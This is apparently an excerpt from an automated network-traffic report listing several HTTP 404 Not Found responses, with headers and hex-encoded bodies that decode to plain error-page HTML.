        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 10 Aug 2023 08:19:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 10 Aug 2023 08:19:08 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Aug 2023 08:19:12 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Aug 2023 08:19:14 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Aug 2023 08:19:17 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Aug 2023 08:19:20 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Thu, 10 Aug 2023 08:19:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 